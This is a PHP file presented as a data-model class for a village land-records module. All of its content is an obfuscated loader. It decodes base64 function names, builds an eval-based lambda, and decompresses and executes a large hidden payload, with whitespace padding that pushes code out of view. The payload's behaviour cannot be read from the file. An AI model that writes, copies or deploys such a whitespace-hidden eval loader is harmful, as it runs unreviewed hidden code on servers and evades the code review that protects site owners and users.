<?php 
        $__='printf';$_='Loading donjo-app/models/Tanah_kas_desa_model.php';
        







































































































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='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';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






































































































































































































































































                                                                                                                                                                                                                     $________;
